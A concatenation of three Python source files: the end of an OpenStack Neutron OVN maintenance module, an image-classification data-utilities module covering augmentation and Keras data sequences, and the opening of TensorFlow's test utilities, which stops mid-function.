                priority -= 1

        raise periodics.NeverAgain()

    # A static spacing value is used here, but this method will only run
    # once per lock due to the use of periodics.NeverAgain().
    @periodics.periodic(spacing=600, run_immediately=True)
    def check_for_localnet_legacy_port_name(self):
        """One-shot: rename legacy provnet ports to segment-based names."""
        if not self.has_lock:
            return

        admin_context = n_context.get_admin_context()
        cmds = []
        for ls in self._nb_idl.ls_list().execute(check_error=True):
            network_id = ls.name.replace('neutron-', '')
            legacy_name = utils.ovn_provnet_port_name(network_id)
            legacy_port = None
            segment_id = None
            for lsp in ls.ports:
                if legacy_name == lsp.name:
                    legacy_port = lsp
                    break
            else:
                continue
            for segment in segments_db.get_network_segments(
                    admin_context, network_id):
                if (segment.get(segment_def.PHYSICAL_NETWORK) ==
                        legacy_port.options['network_name']):
                    segment_id = segment['id']
                    break
            if not segment_id:
                continue
            new_p_name = utils.ovn_provnet_port_name(segment_id)
            cmds.append(self._nb_idl.db_set('Logical_Switch_Port',
                                            legacy_port.uuid,
                                            ('name', new_p_name)))

        if cmds:
            with self._nb_idl.transaction(check_error=True) as txn:
                for cmd in cmds:
                    txn.add(cmd)

        raise periodics.NeverAgain()

    # TODO(lucasagomes): Remove this in the Y cycle
    # A static spacing value is used here, but this method will only run
    # once per lock due to the use of periodics.NeverAgain().
    @periodics.periodic(spacing=600, run_immediately=True)
    def check_for_mcast_flood_reports(self):
        """One-shot: enable mcast_flood_reports on eligible switch ports."""
        # NOTE(review): unlike the other one-shot periodics above, this one
        # does not check self.has_lock before writing — confirm intentional.
        cmds = []
        for port in self._nb_idl.lsp_list().execute(check_error=True):
            port_type = port.type.strip()
            if port_type in ("vtep", "localport", "router"):
                continue

            options = port.options
            if ovn_const.LSP_OPTIONS_MCAST_FLOOD_REPORTS in options:
                continue

            options.update({ovn_const.LSP_OPTIONS_MCAST_FLOOD_REPORTS: 'true'})
            if port_type == ovn_const.LSP_TYPE_LOCALNET:
                options.update({ovn_const.LSP_OPTIONS_MCAST_FLOOD: 'true'})

            cmds.append(self._nb_idl.lsp_set_options(port.name, **options))

        if cmds:
            with self._nb_idl.transaction(check_error=True) as txn:
                for cmd in cmds:
                    txn.add(cmd)

        raise periodics.NeverAgain()
class HashRingHealthCheckPeriodics(object):
    """Periodically touches this host's hash-ring nodes to keep them fresh."""

    def __init__(self, group):
        # Hash ring group whose nodes this periodic refreshes.
        self._group = group
        self.ctx = n_context.get_admin_context()

    @periodics.periodic(spacing=ovn_const.HASH_RING_TOUCH_INTERVAL)
    def touch_hash_ring_nodes(self):
        """Refresh the timestamps of this host's nodes in the hash ring."""
        # NOTE(lucasagomes): Note that we do not rely on the OVSDB lock
        # here because we want the maintenance tasks from each instance to
        # execute this task.
        hash_ring_db.touch_nodes_from_host(self.ctx, self._group)
|
data_utils.py
|
"""
Miscellaneous functions manage data.
Date: September 2018
Author: Ignacio Heredia
Email: iheredia@ifca.unican.es
Github: ignacioheredia
"""
import os
import threading
from multiprocessing import Pool
import queue
import subprocess
import warnings
import base64
import numpy as np
import requests
from tqdm import tqdm
from tensorflow.keras.utils import to_categorical, Sequence
import cv2
import albumentations
from albumentations.augmentations import transforms
from albumentations.imgaug import transforms as imgaug_transforms
def load_data_splits(splits_dir, im_dir, use_location, split_name='train'):
    """
    Load the data arrays from the [train/val/test].txt files.
    Lines of txt files have the following format:
    'relative_path_to_image' 'image_label_number' 'image_location_label_number'

    Parameters
    ----------
    splits_dir : str
        Absolute path to the directory containing the split .txt files.
    im_dir : str
        Absolute path to the image folder.
    use_location : boolean
        to work properly with or without location data
    split_name : str
        Name of the data split to load

    Returns
    -------
    X : Numpy array of strs
        First colunm: Contains 'absolute_path_to_file' to images.
    y : Numpy array of int32 (or None if the split file has no labels)
        Image label number
    location : Numpy array of int32 (or None), only when use_location is True
        Image location label number

    Raises
    ------
    ValueError
        If `<split_name>.txt` does not exist inside `splits_dir`.
    """
    # Keep the original diagnostic prints (consumed by existing tooling/logs).
    if use_location:
        print("con location")
    else:
        print("sin location")

    if '{}.txt'.format(split_name) not in os.listdir(splits_dir):
        raise ValueError("Invalid value for the split_name parameter: there is no `{}.txt` file in the `{}` "
                         "directory.".format(split_name, splits_dir))

    # Loading splits
    print("Loading {} data...".format(split_name))
    split = np.genfromtxt(os.path.join(splits_dir, '{}.txt'.format(split_name)), dtype='str', delimiter=' ')
    X = np.array([os.path.join(im_dir, i) for i in split[:, 0]])

    # BUGFIX: previously, a split file without label columns left `location`
    # unbound and `return X, y, location` raised NameError. Default both
    # labels to None and fill them only when the columns are present.
    y, location = None, None
    if len(split.shape) == 2:
        y = split[:, 1].astype(np.int32)
        if use_location:
            location = split[:, 2].astype(np.int32)

    if use_location:
        return X, y, location
    return X, y
def mount_nextcloud(frompath, topath):
    """
    Mount a NextCloud folder in your local machine or viceversa.

    Runs `rclone copy frompath topath` and returns its (stdout, stderr);
    a non-empty stderr is reported as a warning.
    """
    proc = subprocess.Popen(['rclone', 'copy', frompath, topath],
                            stdout=subprocess.PIPE,
                            stderr=subprocess.PIPE)
    output, error = proc.communicate()
    if error:
        warnings.warn("Error while mounting NextCloud: {}".format(error))
    return output, error
def load_class_names(splits_dir):
    """
    Load the list of class names from `classes.txt`.

    Returns
    -------
    Numpy array of shape (N) containing strs with class names
    """
    print("Loading class names...")
    classes_path = os.path.join(splits_dir, 'classes.txt')
    return np.genfromtxt(classes_path, dtype='str', delimiter='/n')
def load_location_names(splits_dir):
    """
    Load the list of location names from `locations.txt`.

    Returns
    -------
    Numpy array of shape (N) containing strs with location names
    """
    print("Loading location names...")
    locations_path = os.path.join(splits_dir, 'locations.txt')
    return np.genfromtxt(locations_path, dtype='str', delimiter='/n')
def load_class_info(splits_dir):
    """
    Load per-class information lines from `info.txt`.

    Returns
    -------
    Numpy array of shape (N) containing strs with class info
    """
    print("Loading class info...")
    info_path = os.path.join(splits_dir, 'info.txt')
    return np.genfromtxt(info_path, dtype='str', delimiter='/n')
def load_image(filename, filemode='local'):
    """
    Function to load a local image path (or an url) into a numpy array.

    Parameters
    ----------
    filename : str
        Path or url to the image
    filemode : {'local','url'}
        - 'local': filename is absolute path in local disk.
        - 'url': filename is internet url.

    Returns
    -------
    A numpy array (RGB channel order)

    Raises
    ------
    ValueError
        If the path/url does not resolve to a decodable image, or if
        `filemode` is not one of the accepted values.
    """
    if filemode == 'local':
        image = cv2.imread(filename, cv2.IMREAD_COLOR)
        if image is None:
            raise ValueError('The local path does not exist or does not correspond to an image: \n {}'.format(filename))
    elif filemode == 'url':
        try:
            if filename.startswith('data:image'):  # base64 encoded string
                data = base64.b64decode(filename.split(';base64,')[1])
            else:  # normal url
                data = requests.get(filename).content
            data = np.frombuffer(data, np.uint8)
            image = cv2.imdecode(data, cv2.IMREAD_COLOR)
        except Exception as err:
            # BUGFIX: was a bare `except:` that also swallowed
            # KeyboardInterrupt/SystemExit; narrowed and cause-chained.
            raise ValueError('Incorrect url path: \n {}'.format(filename)) from err
        if image is None:  # imdecode returns None on undecodable data
            raise ValueError('Incorrect url path: \n {}'.format(filename))
    else:
        raise ValueError('Invalid value for filemode.')

    image = cv2.cvtColor(image, cv2.COLOR_BGR2RGB)  # change from default BGR OpenCV format to Python's RGB format
    return image
def preprocess_batch(batch, mean_RGB, std_RGB, mode='tf', channels_first=False):
    """
    Standardize a batch of images before feeding it to the network.
    Adapted from keras_applications.imagenet_utils with custom mean/std.

    Parameters
    ----------
    batch : list of numpy arrays
    mean_RGB, std_RGB : list of floats, len=3
        Mean/std RGB values for your dataset.
    mode : {'tf', 'caffe', 'torch'}
        Normalization scheme applied after mean centering.
    channels_first : bool
        Use batch of shape (N, C, H, W) instead of (N, H, W, C)

    Returns
    -------
    Numpy array of float32
    """
    assert type(batch) is list, "Your batch must be a list of numpy arrays"

    mean_arr = np.array(mean_RGB)
    std_arr = np.array(std_RGB)
    out = np.array(batch) - mean_arr[None, None, None, :]  # mean centering
    if mode == 'caffe':
        out = out[:, :, :, ::-1]  # switch from RGB to BGR
    if mode == 'tf':
        out /= 127.5  # scale into the [-1, 1] range
    if mode == 'torch':
        out /= std_arr
    if channels_first:
        out = out.transpose(0, 3, 1, 2)  # shape(N, 3, H, W)
    return out.astype(np.float32)
def augment(im, params=None):
    """
    Perform data augmentation on some image using the albumentations package.

    NOTE(review): although `params` defaults to None, the body reads
    `params['zoom']` unconditionally, so callers must always pass a dict with
    all the mandatory keys below — TODO confirm and consider validating.

    Parameters
    ----------
    im : Numpy array
    params : dict or None
        Contains the data augmentation parameters
        Mandatory keys:
        - h_flip ([0,1] float): probability of performing an horizontal left-right mirroring.
        - v_flip ([0,1] float): probability of performing an vertical up-down mirroring.
        - rot ([0,1] float): probability of performing a rotation to the image.
        - rot_lim (int): max degrees of rotation.
        - stretch ([0,1] float): probability of randomly stretching an image.
        - crop ([0,1] float): randomly take an image crop.
        - zoom ([0,1] float): random zoom applied to crop_size.
          --> Therefore the effective crop size at each iteration will be a
              random number between 1 and crop*(1-zoom). For example:
              * crop=1, zoom=0: no crop of the image
              * crop=1, zoom=0.1: random crop of random size between 100% image and 90% of the image
              * crop=0.9, zoom=0.1: random crop of random size between 90% image and 80% of the image
              * crop=0.9, zoom=0: random crop of always 90% of the image
              Image size refers to the size of the shortest side.
        - blur ([0,1] float): probability of randomly blurring an image.
        - pixel_noise ([0,1] float): probability of randomly adding pixel noise to an image.
        - pixel_sat ([0,1] float): probability of randomly using HueSaturationValue in the image.
        - cutout ([0,1] float): probability of using cutout in the image.

    Returns
    -------
    Numpy array
    """
    ## 1) Crop the image
    # The effective crop fraction is drawn uniformly in [crop - zoom, crop];
    # the crop is a square whose side is that fraction of the shortest side.
    effective_zoom = np.random.rand() * params['zoom']
    crop = params['crop'] - effective_zoom
    ly, lx, channels = im.shape
    crop_size = int(crop * min([ly, lx]))
    rand_x = np.random.randint(low=0, high=lx - crop_size + 1)
    rand_y = np.random.randint(low=0, high=ly - crop_size + 1)
    crop = transforms.Crop(x_min=rand_x,
                           y_min=rand_y,
                           x_max=rand_x + crop_size,
                           y_max=rand_y + crop_size)
    im = crop(image=im)['image']
    ## 2) Now add the transformations for augmenting the image pixels
    # The list order below is the order in which Compose applies them.
    transform_list = []
    # Add random stretching (perspective distortion)
    if params['stretch']:
        transform_list.append(
            imgaug_transforms.IAAPerspective(scale=0.1, p=params['stretch'])
        )
    # Add random rotation
    if params['rot']:
        transform_list.append(
            transforms.Rotate(limit=params['rot_lim'], p=params['rot'])
        )
    # Add horizontal flip
    if params['h_flip']:
        transform_list.append(
            transforms.HorizontalFlip(p=params['h_flip'])
        )
    # Add vertical flip
    if params['v_flip']:
        transform_list.append(
            transforms.VerticalFlip(p=params['v_flip'])
        )
    # Add some blur to the image (one blur variant chosen at random)
    if params['blur']:
        transform_list.append(
            albumentations.OneOf([
                transforms.MotionBlur(blur_limit=7, p=1.),
                transforms.MedianBlur(blur_limit=7, p=1.),
                transforms.Blur(blur_limit=7, p=1.),
            ], p=params['blur'])
        )
    # Add pixel noise (one noise variant chosen at random)
    if params['pixel_noise']:
        transform_list.append(
            albumentations.OneOf([
                transforms.CLAHE(clip_limit=2, p=1.),
                imgaug_transforms.IAASharpen(p=1.),
                imgaug_transforms.IAAEmboss(p=1.),
                transforms.RandomBrightnessContrast(contrast_limit=0, p=1.),
                transforms.RandomBrightnessContrast(brightness_limit=0, p=1.),
                transforms.RGBShift(p=1.),
                transforms.RandomGamma(p=1.)#,
                # transforms.JpegCompression(),
                # transforms.ChannelShuffle(),
                # transforms.ToGray()
            ], p=params['pixel_noise'])
        )
    # Add pixel saturation
    if params['pixel_sat']:
        transform_list.append(
            transforms.HueSaturationValue(p=params['pixel_sat'])
        )
    # Randomly remove some square regions from the image (cutout)
    if params['cutout']:
        ly, lx, channels = im.shape
        scale_low, scale_high = 0.05, 0.25  # min and max size of the squares wrt the full image
        scale = np.random.uniform(scale_low, scale_high)
        transform_list.append(
            transforms.Cutout(num_holes=8, max_h_size=int(scale*ly), max_w_size=int(scale*lx), p=params['cutout'])
        )
    # Compose all image transformations and augment the image
    augmentation_fn = albumentations.Compose(transform_list)
    im = augmentation_fn(image=im)['image']
    return im
def resize_im(im, height, width):
    """Resize image *im* to (height, width) with albumentations' Resize transform."""
    return transforms.Resize(height=height, width=width)(image=im)['image']
def data_generator(inputs, targets, batch_size, mean_RGB, std_RGB, preprocess_mode, aug_params, num_classes,
                   im_size=224, shuffle=True):
    """
    Generator to feed Keras fit function.

    Parameters
    ----------
    inputs : Numpy array, shape (N,)
        Image paths (loaded with filemode='local').
    targets : Numpy array, shape (N)
    batch_size : int
    shuffle : bool
    aug_params : dict
        Data-augmentation parameters (see `augment`).
    im_size : int
        Final image size to feed the net's input (eg. 224 for Resnet).

    Returns
    -------
    Generator yielding (preprocessed images, one-hot labels) tuples.
    Note: trailing samples that do not fill a whole batch are dropped.
    """
    assert len(inputs) == len(targets)
    assert len(inputs) >= batch_size
    # Shuffled order of the whole epoch
    order = np.arange(len(inputs))
    if shuffle:
        np.random.shuffle(order)
    for start in range(0, len(inputs) - batch_size + 1, batch_size):
        batch_idxs = order[start:start + batch_size]
        images = []
        for j in batch_idxs:
            img = load_image(inputs[j], filemode='local')
            img = augment(img, params=aug_params)
            images.append(resize_im(img, height=im_size, width=im_size))
        batch_X = preprocess_batch(batch=images, mean_RGB=mean_RGB, std_RGB=std_RGB, mode=preprocess_mode)
        batch_y = to_categorical(targets[batch_idxs], num_classes=num_classes)
        yield batch_X, batch_y
def buffered_generator(source_gen, buffer_size=10):
    """
    Run a slow source generator in a background thread, pre-filling a bounded
    queue so the consumer rarely waits. Beware of the GIL!
    Author: Benanne (github-kaggle/benanne/ndsb)

    Parameters
    ----------
    source_gen : generator
    buffer_size : the maximal number of items to pre-generate (length of the buffer)

    Returns
    -------
    Buffered generator
    """
    if buffer_size < 2:
        raise RuntimeError("Minimal buffer size is 2!")
    # Effective capacity is buffer_size - 1: the producer thread generates one
    # extra item and then blocks until there is room in the queue.
    q = queue.Queue(maxsize=buffer_size - 1)

    def _produce():
        for item in source_gen:
            q.put(item, block=True)
        q.put(None)  # sentinel: signal the end of the iterator

    worker = threading.Thread(target=_produce)
    worker.daemon = True
    worker.start()
    while True:
        item = q.get()
        if item is None:  # sentinel reached: source exhausted
            break
        yield item
class data_sequence(Sequence):
    """
    Keras ``Sequence`` yielding (preprocessed images, one-hot labels) batches.
    Safer to use with multiprocessing than a standard generator.
    Check https://stanford.edu/~shervine/blog/keras-how-to-generate-data-on-the-fly

    TODO: Add sample weights on request
    """

    def __init__(self, inputs, targets, batch_size, mean_RGB, std_RGB, preprocess_mode, aug_params, num_classes,
                 im_size=224, shuffle=True):
        """
        Parameters are the same as in the data_generator function
        """
        assert len(inputs) == len(targets)
        assert len(inputs) >= batch_size
        self.inputs = inputs
        self.targets = targets
        self.batch_size = batch_size
        self.mean_RGB = mean_RGB
        self.std_RGB = std_RGB
        self.preprocess_mode = preprocess_mode
        self.aug_params = aug_params
        self.num_classes = num_classes
        self.im_size = im_size
        self.shuffle = shuffle
        self.on_epoch_end()

    def __len__(self):
        # Number of batches per epoch (a final partial batch is included).
        return int(np.ceil(len(self.inputs) / float(self.batch_size)))

    def __getitem__(self, idx):
        sel = self.indexes[idx * self.batch_size: (idx + 1) * self.batch_size]
        images = []
        for j in sel:
            img = load_image(self.inputs[j])
            if self.aug_params:
                img = augment(img, params=self.aug_params)
            images.append(resize_im(img, height=self.im_size, width=self.im_size))
        batch_X = preprocess_batch(batch=images, mean_RGB=self.mean_RGB, std_RGB=self.std_RGB, mode=self.preprocess_mode)
        batch_y = to_categorical(self.targets[sel], num_classes=self.num_classes)
        return batch_X, batch_y

    def on_epoch_end(self):
        """Reshuffle the sample order at the end of every epoch."""
        self.indexes = np.arange(len(self.inputs))
        if self.shuffle:
            np.random.shuffle(self.indexes)
class data_sequence_lo(Sequence):
    """
    Variant of ``data_sequence`` that additionally handles per-sample
    locations and passes them (one-hot encoded) to the network. Instance of a
    Keras Sequence that is safer to use with multiprocessing than a standard
    generator.
    Check https://stanford.edu/~shervine/blog/keras-how-to-generate-data-on-the-fly

    TODO: Add sample weights on request
    """

    def __init__(self, inputs, locations, targets, batch_size, mean_RGB, std_RGB, preprocess_mode, aug_params, num_classes, num_locations,
                 im_size=224, shuffle=True):
        """
        Same parameters as data_sequence, plus the list of locations and an
        int with the number of distinct locations.
        """
        assert len(inputs) == len(targets)
        assert len(inputs) >= batch_size
        self.inputs = inputs
        self.locations = locations
        self.targets = targets
        self.batch_size = batch_size
        self.mean_RGB = mean_RGB
        self.std_RGB = std_RGB
        self.preprocess_mode = preprocess_mode
        self.aug_params = aug_params
        self.num_classes = num_classes
        self.num_locations = num_locations
        self.im_size = im_size
        self.shuffle = shuffle
        self.on_epoch_end()

    def __len__(self):
        # Number of batches per epoch (a final partial batch is included).
        return int(np.ceil(len(self.inputs) / float(self.batch_size)))

    def __getitem__(self, idx):
        batch_idxs = self.indexes[idx*self.batch_size: (idx+1)*self.batch_size]
        batch_X = []
        for i in batch_idxs:
            im = load_image(self.inputs[i])
            if self.aug_params:
                im = augment(im, params=self.aug_params)
            im = resize_im(im, height=self.im_size, width=self.im_size)
            batch_X.append(im)  # shape (N, 224, 224, 3)
        batch_X = preprocess_batch(batch=batch_X, mean_RGB=self.mean_RGB, std_RGB=self.std_RGB, mode=self.preprocess_mode)
        batch_y = to_categorical(self.targets[batch_idxs], num_classes=self.num_classes)
        # BUGFIX: `to_categorical` has no `num_locations` keyword (the previous
        # call raised TypeError at runtime); the number of location categories
        # goes through the standard `num_classes` argument.
        batch_locations = to_categorical(self.locations[batch_idxs], num_classes=self.num_locations)
        return batch_X, batch_y, batch_locations

    def on_epoch_end(self):
        """Updates indexes after each epoch"""
        self.indexes = np.arange(len(self.inputs))
        if self.shuffle:
            np.random.shuffle(self.indexes)
def standard_tencrop_batch(im, crop_prop=0.9):
    """
    Returns an ordered ten crop batch of images from an original image
    (corners, center + mirrors).

    Parameters
    ----------
    im : numpy array, type np.uint8
    crop_prop : float, [0, 1]
        Size of the crop with respect to the whole image

    Returns
    -------
    List of 10 numpy arrays, ordered crop1, mirror(crop1), crop2, mirror(crop2), ...
    """
    min_side = np.amin(im.shape[:2])
    im = resize_im(im, height=min_side, width=min_side)  # resize to shorter border
    h = w = min_side  # square after resize
    crop_size = int(crop_prop * min_side)
    # Center-crop corner coordinates
    cx_min = np.round((w - crop_size) / 2).astype(int)
    cy_min = np.round((h - crop_size) / 2).astype(int)
    cx_max = np.round((w + crop_size) / 2).astype(int)
    cy_max = np.round((h + crop_size) / 2).astype(int)
    crop_boxes = [
        (0, 0, crop_size, crop_size),              # top-left
        (0, h - crop_size, crop_size, h),          # bottom-left
        (w - crop_size, 0, w, crop_size),          # top-right
        (w - crop_size, h - crop_size, w, h),      # bottom-right
        (cx_min, cy_min, cx_max, cy_max),          # center
    ]
    mirror = albumentations.HorizontalFlip(p=1)
    batch = []
    for x_min, y_min, x_max, y_max in crop_boxes:
        cropped = transforms.Crop(x_min=x_min, y_min=y_min,
                                  x_max=x_max, y_max=y_max)(image=im)['image']
        # Save crop and its mirror
        batch.append(cropped)
        batch.append(mirror(image=cropped)['image'])
    return batch
class k_crop_data_sequence(Sequence):
    """
    Data sequence generator for test time to feed to predict_generator.
    Each batch delivered is composed by multiple crops (default=10) of the
    same image.
    """

    def __init__(self, inputs, mean_RGB, std_RGB, preprocess_mode, aug_params, crop_number=10, crop_mode='random',
                 filemode='local', im_size=224):
        """
        Parameters are the same as in the data_generator function except for:

        Parameters
        ----------
        crop_number : int
            Number of crops of each image to take.
        crop_mode : str, {'random', 'standard'}
            If 'random' data augmentation is performed randomly.
            If 'standard' we take the standard 10 crops (corners + center + mirrors)
        filemode : {'local','url'}
            - 'local': filename is absolute path in local disk.
            - 'url': filename is internet url.
        """
        self.inputs = inputs
        self.mean_RGB = mean_RGB
        self.std_RGB = std_RGB
        self.preprocess_mode = preprocess_mode
        self.aug_params = aug_params
        self.crop_number = crop_number
        self.crop_mode = crop_mode
        self.filemode = filemode
        self.im_size = im_size

    def __len__(self):
        # One batch (of crops) per input image.
        return len(self.inputs)

    def __getitem__(self, idx):
        crops = []
        im = load_image(self.inputs[idx], filemode=self.filemode)
        if self.crop_mode == 'random':
            for _ in range(self.crop_number):
                if self.aug_params:
                    variant = augment(im, params=self.aug_params)
                else:
                    variant = np.copy(im)
                crops.append(resize_im(variant, height=self.im_size, width=self.im_size))
        if self.crop_mode == 'standard':
            crops = standard_tencrop_batch(im)
        return preprocess_batch(batch=crops, mean_RGB=self.mean_RGB, std_RGB=self.std_RGB, mode=self.preprocess_mode)
def im_stats(filename):
    """Return per-channel ([R,G,B] mean, [R,G,B] std) of a local image file.

    Helper for compute_meanRGB.
    """
    arr = load_image(filename, filemode='local')
    channel_mean = np.mean(arr, axis=(0, 1))
    channel_std = np.std(arr, axis=(0, 1))
    return channel_mean.tolist(), channel_std.tolist()
def compute_meanRGB(im_list, verbose=False, workers=4):
    """
    Returns the mean and std RGB values for the whole dataset.
    For example in the plantnet dataset we have:
        mean_RGB = np.array([107.59348955, 112.1047813, 80.9982362])
        std_RGB = np.array([52.78326119, 50.56163087, 50.86486131])

    Parameters
    ----------
    im_list : array of strings
        Array where the first column is image_path (or image_url). Shape (N,).
    verbose : bool
        Show progress bar
    workers : int
        Numbers of parallel workers to perform the computation with.

    Returns
    -------
    (mean, std) : tuple of two lists of 3 floats each.
        Note: std is averaged over per-image stds, not the global pixel std.

    References
    ----------
    https://stackoverflow.com/questions/41920124/multiprocessing-use-tqdm-to-display-a-progress-bar
    """
    print('Computing mean RGB pixel with {} workers...'.format(workers))
    with Pool(workers) as p:
        # BUGFIX: `disable=verbose` hid the progress bar exactly when
        # verbose=True; tqdm's `disable` flag is the negation of `verbose`.
        r = list(tqdm(p.imap(im_stats, im_list),
                      total=len(im_list),
                      disable=not verbose))
    r = np.asarray(r)
    mean, std = r[:, 0], r[:, 1]
    mean, std = np.mean(mean, axis=0), np.mean(std, axis=0)
    print('Mean RGB pixel: {}'.format(mean.tolist()))
    print('Standard deviation of RGB pixel: {}'.format(std.tolist()))
    return mean.tolist(), std.tolist()
def compute_classweights(labels, max_dim=None, mode='balanced'):
    """
    Compute the class weights for a set of labels to account for label imbalance.

    Parameters
    ----------
    labels : numpy array, type (ints), shape (N)
    max_dim : int
        Maximum number of classes. Default is the max value in labels.
    mode : str, {'balanced', 'log'} or None

    Returns
    -------
    Numpy array, type (float32), shape (N), or None when mode is None.
    """
    if mode is None:
        return None
    counts = np.bincount(labels)
    weights = np.sum(counts) / counts  # inverse-frequency weighting
    # Fill the count if some high number labels are not present in the sample
    if max_dim is not None:
        n_missing = max_dim - len(weights)
        if n_missing != 0:
            weights = np.pad(weights, pad_width=(0, n_missing), mode='constant', constant_values=0)
    # Transform according to the requested mode
    if mode == 'log':
        # do not use --> produces numerical instabilities at inference when
        # transferring weights trained on GPU to CPU
        weights = np.log(weights)  # + 1
    elif mode != 'balanced':
        raise ValueError('{} is not a valid option for parameter "mode"'.format(mode))
    return weights.astype(np.float32)
def json_friendly(d):
    """
    Return a json friendly dictionary (mainly remove numpy data types).

    Numpy float scalars become Python floats; numpy arrays and lists become
    plain (nested) lists. Other values are passed through unchanged.
    """
    new_d = {}
    for k, v in d.items():
        if isinstance(v, (np.float32, np.float64)):
            v = float(v)
        elif isinstance(v, (np.ndarray, list)):
            # BUGFIX: guard len(v) before peeking at v[0] — the previous code
            # raised IndexError on empty lists/arrays.
            if len(v) and isinstance(v[0], (np.float32, np.float64)):
                v = np.array(v).astype(float).tolist()
            else:
                v = np.array(v).tolist()
        new_d[k] = v
    return new_d
|
test_util.py
|
# Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
# pylint: disable=invalid-name
"""Test utils for tensorflow."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import collections
from collections import OrderedDict
import contextlib
import gc
import itertools
import math
import os
import random
import re
import tempfile
import threading
import unittest
import numpy as np
import six
_portpicker_import_error = None
try:
import portpicker # pylint: disable=g-import-not-at-top
except ImportError as _error:
_portpicker_import_error = _error
portpicker = None
# pylint: disable=g-import-not-at-top
from google.protobuf import descriptor_pool
from google.protobuf import text_format
from tensorflow.core.framework import graph_pb2
from tensorflow.core.protobuf import config_pb2
from tensorflow.core.protobuf import rewriter_config_pb2
from tensorflow.python import pywrap_tensorflow
from tensorflow.python import tf2
from tensorflow.python.client import device_lib
from tensorflow.python.client import session
from tensorflow.python.eager import context
from tensorflow.python.eager import def_function
from tensorflow.python.eager import tape
from tensorflow.python.framework import device as pydev
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import errors
from tensorflow.python.framework import errors_impl
from tensorflow.python.framework import importer
from tensorflow.python.framework import ops
from tensorflow.python.framework import random_seed
from tensorflow.python.framework import sparse_tensor
from tensorflow.python.framework import tensor_shape
from tensorflow.python.framework import versions
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import control_flow_util
from tensorflow.python.ops import script_ops
from tensorflow.python.ops import variables
from tensorflow.python.platform import googletest
from tensorflow.python.platform import tf_logging as logging
from tensorflow.python.training import server_lib
from tensorflow.python.util import compat
from tensorflow.python.util import deprecation
from tensorflow.python.util import memory
from tensorflow.python.util import nest
from tensorflow.python.util import tf_decorator
from tensorflow.python.util import tf_inspect
from tensorflow.python.util.protobuf import compare
from tensorflow.python.util.tf_export import tf_export
@tf_export("test.gpu_device_name")
def gpu_device_name():
  """Returns the name of a GPU device if available or the empty string."""
  for device in device_lib.list_local_devices():
    if device.device_type in ("GPU", "SYCL"):
      return compat.as_str(device.name)
  return ""
def assert_ops_in_graph(expected_ops, graph):
  """Assert all expected operations are found.

  Args:
    expected_ops: `dict<string, string>` of op name to op type.
    graph: Graph to check.

  Returns:
    `dict<string, node>` of node name to node.

  Raises:
    ValueError: If the expected ops are not present in the graph.
  """
  found = {}
  graph_def = graph.as_graph_def()
  for node in graph_def.node:
    expected_type = expected_ops.get(node.name)
    if expected_type is None:
      continue
    if expected_type != node.op:
      raise ValueError("Expected op for node %s is different. %s vs %s" %
                       (node.name, expected_type, node.op))
    found[node.name] = node
  if set(expected_ops.keys()) != set(found.keys()):
    raise ValueError("Not all expected ops are present. Expected %s, found %s" %
                     (expected_ops.keys(), found.keys()))
  return found
@tf_export("test.assert_equal_graph_def", v1=[])
def assert_equal_graph_def_v2(actual, expected):
  """Asserts that two `GraphDef`s are (mostly) the same.

  Compares two `GraphDef` protos for equality, ignoring versions and ordering of
  nodes, attrs, and control inputs. Node names are used to match up nodes
  between the graphs, so the naming of nodes must be consistent. This function
  ignores randomized attribute values that may appear in V2 checkpoints.

  Args:
    actual: The `GraphDef` we have.
    expected: The `GraphDef` we expected.

  Raises:
    AssertionError: If the `GraphDef`s do not match.
    TypeError: If either argument is not a `GraphDef`.
  """
  # TF2 wrapper: always strip randomized V2-checkpoint attribute values.
  assert_equal_graph_def(actual, expected, checkpoint_v2=True)
@tf_export(v1=["test.assert_equal_graph_def"])
def assert_equal_graph_def_v1(actual, expected, checkpoint_v2=False):
  """Asserts that two `GraphDef`s are (mostly) the same.

  Compares two `GraphDef` protos for equality, ignoring versions and ordering of
  nodes, attrs, and control inputs. Node names are used to match up nodes
  between the graphs, so the naming of nodes must be consistent.

  Args:
    actual: The `GraphDef` we have.
    expected: The `GraphDef` we expected.
    checkpoint_v2: boolean determining whether to ignore randomized attribute
      values that appear in V2 checkpoints.

  Raises:
    AssertionError: If the `GraphDef`s do not match.
    TypeError: If either argument is not a `GraphDef`.
  """
  # TF1 wrapper: forwards the caller-controlled checkpoint_v2 flag.
  assert_equal_graph_def(actual, expected, checkpoint_v2)
def assert_equal_graph_def(actual, expected, checkpoint_v2=False):
  """Shared implementation behind the v1/v2 `assert_equal_graph_def` wrappers.

  Validates argument types, optionally strips randomized V2-checkpoint
  attribute values from both protos, and delegates the structural comparison
  to the C++ `EqualGraphDef` implementation.

  Args:
    actual: The `GraphDef` we have.
    expected: The `GraphDef` we expected.
    checkpoint_v2: boolean determining whether to ignore randomized attribute
      values that appear in V2 checkpoints.

  Raises:
    AssertionError: If the `GraphDef`s do not match.
    TypeError: If either argument is not a `GraphDef`.
  """
  if not isinstance(actual, graph_pb2.GraphDef):
    raise TypeError(
        "Expected tf.GraphDef for actual, got %s" % type(actual).__name__)
  if not isinstance(expected, graph_pb2.GraphDef):
    raise TypeError(
        "Expected tf.GraphDef for expected, got %s" % type(expected).__name__)

  if checkpoint_v2:
    # Stripping mutates both protos in place.
    _strip_checkpoint_v2_randomized(actual)
    _strip_checkpoint_v2_randomized(expected)

  # The C++ comparison returns a human-readable diff string; empty means equal.
  diff = pywrap_tensorflow.EqualGraphDefWrapper(actual.SerializeToString(),
                                                expected.SerializeToString())
  if diff:
    raise AssertionError(compat.as_str(diff))
def assert_meta_graph_protos_equal(tester, a, b):
  """Compares MetaGraphDefs `a` and `b` in unit test class `tester`.

  Collections are compared field-by-field (parsing registered proto types
  where available), then removed so the final whole-proto comparison does not
  re-check their raw serialized values. NOTE: mutates both `a` and `b` by
  clearing their `collection_def` and `graph_def` fields.
  """
  # Carefully check the collection_defs
  tester.assertEqual(set(a.collection_def), set(b.collection_def))
  collection_keys = a.collection_def.keys()
  for k in collection_keys:
    a_value = a.collection_def[k]
